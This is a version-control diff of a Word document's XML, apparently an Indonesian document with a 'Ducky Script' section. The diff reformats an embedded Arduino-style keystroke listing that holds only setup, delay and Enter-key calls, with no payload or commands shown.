         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -24747,7 +24962,7 @@
         </w:rPr>
         <w:t>Ducky Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="78"/>
+      <w:bookmarkEnd w:id="93"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24899,25 +25114,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>int key) {</w:t>
+                              <w:t>void typeKey(int key) {</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -24951,18 +25148,8 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
+                              <w:t xml:space="preserve">  delay(</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -25038,25 +25225,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">void </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>setup(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>) {</w:t>
+                              <w:t>void setup() {</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25133,18 +25302,8 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
+                              <w:t xml:space="preserve">  delay(</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -25245,25 +25404,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25297,25 +25438,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25332,25 +25455,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25384,25 +25489,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25419,25 +25506,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25454,25 +25523,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25506,25 +25557,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25541,25 +25574,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25593,25 +25608,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25628,25 +25625,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25680,25 +25659,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25715,25 +25676,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25767,25 +25710,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25802,25 +25727,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25854,25 +25761,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25889,25 +25778,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25941,25 +25812,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -25976,18 +25829,8 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
+                              <w:t xml:space="preserve">  delay(</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -26037,25 +25880,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26072,25 +25897,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26124,25 +25931,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26159,25 +25948,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26211,25 +25982,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26246,25 +25999,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26298,25 +26033,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26333,25 +26050,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26385,25 +26084,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26420,25 +26101,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -26472,25 +26135,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
